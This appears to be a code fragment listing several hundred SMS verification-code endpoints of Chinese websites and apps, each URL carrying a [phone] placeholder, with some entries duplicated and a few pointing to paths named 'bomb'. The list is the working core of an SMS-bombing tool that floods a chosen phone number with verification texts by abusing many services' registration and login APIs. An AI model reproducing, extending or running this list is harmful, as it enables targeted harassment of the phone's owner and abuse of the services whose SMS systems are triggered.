"https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]", + "https://api.pkg.cn/api/sms/codeaccNbr=[phone]", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]", + "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]", + "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]", + "https://app-api.shop.ele.me/arena/invoke/?method=OpenAPIRegisterService.sendVerifyCode&site_id=gw_Cloudgame&geetest_challenge=&geetest_validate=&geetest_seccode=&reportData=number=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]", + "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", + "https://app.zhuanzhuan.com/zz/transfer/getCaptcha?type=1&mobile=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=AppStore&ip=192.168.43.151&mobile=[phone]", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]", + "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]", + "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]", + "https://card.10010.com/ko-order/messageCaptcha/send?phoneVal=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]", + "https://cloud.nucarf.com/rest/querySmsCode?phoneNum=[phone]", + "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", + "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]", + "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]", + "https://ddt.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", + "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]", + "https://eapi.huolala.cn/?_m=account&_a=sms_code&args=%7B%22phone_no%22%3A%22[phone]", + "https://edu.10086.cn/sso/sendSmsMsg&do=get_vcode&user_mobile=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "https://fudao.qq.com/cgi-proxy/common_func/send_sms_code?phone=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]", + "https://graph.3vjia.com/captcha/mobile/REG/[phone]", + "https://gwbk.zhongan.com/dmapiv2/za-dm-insure/dm/user/sendSMGCode?mobilePhone=[phone]&from=web", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]", + "https://h5.gumipet.com/shops_sms_register?phone=[phone]", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]", + "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", + "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=bdfa0471b3354eba9d5a424121bdf37c&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", + "https://host.convertlab.com/sms/token?mobile=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "https://im.molinsoft.com/validate.jsp?randromid=0.2002692325464066mobileNumber=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "https://jdapi.jd100.com:443/uc/v1/getSMSCode?account=[phone]", + "https://jiameng.baidu.com/portal/com/captcha?ajax=1&device=pc[phone]", + "https://ka.niwodai.com/loans-mobile/validatecode.do?method=refresh&date=1557210332912interval=60&phone=[phone]", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]", + "https://khweb.easec.com.cn:12203/nImgServlet?key=0.17275703431645484&funcNo=501520&op_source=3&flow_type=twvideo&ip=&mac=&verify_code=mobile_no=[phone]", + "https://live.weaver.com.cn/homepage/createCode2?jsonpcallback=jQuery11020786823554715125_1594648708687&phonenum=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "https://login.10086.cn/chkNumberAction.action?userName=[phone]", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery1830021546042600087745_1584433571320&phone=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303640777548241676_1579193274318&phone=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", + "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]", + "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]", + "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=13058226398&national_code=86&from=1&bkn=1557826707&_=1596758267792", + "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", + "https://m.lubsj.com/index.php?app=member&act=send_captcha&phone_mob=[phone]", + "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]", + "https://member.chinaacc.com/api/SmsCode.shtm?jsonpCallback=success_jsonpCallback&siteId=3&mobilePhone=[phone]", + "https://mktmain.daikuan.360.cn/activity/pcguide/cdsmsCode?callback=_360jr1603842207037&mobile=[phone]", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://mobilegt.weidai.com.cn/api/v2/verify/mobile/[phone]", + "https://mp.66law.cn/Common/GetValidateCode?time=1574424867777mobilePhone=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", + "https://msgo.10010.com/lsd-message/send/captcha/phone/v1?phoneNumber=&event=mobileloginusername=86-[phone]", + "https://my.800hr.com/inc/checkcode/?width=60&high=30&size=12&tm=21m25s13&type=1&channel=2&act=getphonecode®_code=user_phone=[phone]", + "https://mzone.yqb.com/mzone-http/sms/send_sms[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", + "https://oa.dingtalk.com/omp/sms/send_check_code_img&vcode=uaiIIuNYyv&ajax=1&r=0.37962152601011057step=getverifycode&u_nme=undefined&mobi=[phone]", + "https://open.shiguangkey.com/api/udb/verifycode/get/smscode?phone=86-[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]", + "https://open.zhundao.net/api/v2/senCode?&phoneOrEmail=[phone]", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]", + "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", + "https://passport.1yyg.com/JPData?action=send2Msg+userMobile=[phone]", + "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "https://passport.chinagoldcoin.net/user/checkAuthCode?mobile=[phone]", + "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031&amp;timestamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", + "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031×tamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]", + "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]", + "https://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]", + "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", + "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", + "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", + "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", + "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "https://sso.360che.com/?c=code&_0.6284588856010609&tel=code=[phone]", + "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", + "https://u.house.ifeng.com/getVerifyCode?_=0.38838852170651417&_t=1565612980&verifyCode=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", + "https://user.chinahr.com/cppt/open/msg/send/smsCode?mobile=[phone]&isVisitor=isVisitor", + "https://user.daojia.com/mobile/getcode?mobile=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]", + "https://user.zixia.com/class/CAP/codeshow.php?sid=2090&quhao=86appname=cellphonereg&action=sendcode&yzidcode=[phone]", + "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", + "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", + "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", + "https://webapi.account.mihayo.com/Api/create_mobile_captcha&gameId=[phone]", + "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", + "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", + "https://www.birdnet.cn/source/plugin/login_mobile/index.php?version=4&module=[phone]", + "https://www.diantoushi.com/user/v2/captcha?mobile=[phone]", + "https://www.gac-toyota.com.cn/sublayouts/Member%20Center/VerifyCode.aspx?random=0.6042665278484218&ws_Method=getDynamicCodeTEL_NO=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://www.hneao.cn/gkcjzm/Sat/SendSmsCode?codetype=ZC&sjhm=17623183206&smscode=[phone]", + "https://www.jdpay.com/login/register/sendActiveCode.htm?tel=[phone]", + "https://www.midea.cn/next/user_assist/getverifycode?mobile=[phone]", + "https://www.moretickets.com/openapi/pub/photo_codes/v1/photo_code?bizCode=MTL&verifyCodeUseType=USER_LOGIN&cellphone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", + "https://www.sogou.com/websearch/phoneAddress.jsp?phoneNumber=[phone]", + "https://www.sww.com.cn/login/captcha?0.8916150596759647&sms_captcha=phone_num=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]", + "https://www.wanmeiip.com/source/class/captcha/captcha.php?0.41730894602711244validate=[phone]", + "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", + "https://www.xxwolo.com/ccsrv/apph5/sendShortMsg?phone=[phone]", + "https://www.zhufuc.com/admin/api/center/code/verifycode?ran=0.25068726233475025&type=5&verifycode=[phone]", + "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", + "https://wx.zhonghebuke.com/api/zmweb/v1/user/smsLoginCode&category=signin_or_signupphone_number=[phone]", + "http://h.zy40.cn/dx/index.php?hm=[phone]", + "http://dx.zy40.cn/dx/index.php?hm=[phone]", + "http://m.zy40.cn/dx/index.php?hm=[phone]", + "http://qqz.xiaojiangwl.com/?yChgSnXh=[phone]", + "http://cthwallet.com/en/data/dy/index.php?hm=[phone]", + "http://hezi.ainide.cn/hzq/lt213.php?hm=[phone]", + "http://zgtv.spo38.igeek.gq/aip/index3.php?hm=[phone]", + "api.php?hm=[phone]", + "http://hezi.ainide.cn/hzq/lt213.php?hm=[phone]", + "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", + "http://www.yaya.cn/tools/web_submit.ashx?action=reg_get_mobile_code&mobile=[phone]", + "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", + "http://www.edu-edu.com/cas/web/message/send?phone=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", + "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", + "http://www.songhebao.com/serv/api/member/GetSMSCode.ashx?phone=[phone]", + "http://passport.kuaichecaifu.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=&agent=[phone]&_=1500773935216", + "http://passport.centanet.com/m/page/ajax/20C79442F06E.ashx?Act=SetCode&phone=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "http://114.55.104.205/api/auth/send?mobile=&access_token=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", + "http://www.52gcc.com/bomb/index.php?hm=[phone]", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", + "http://sapi.16888.com/app.php?mod=account&extra=mobileCode&mobile=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", + "http://app.syxwnet.com/?app=member&controller=index&action=sendMobileMessage&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://activity.renren.com/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + 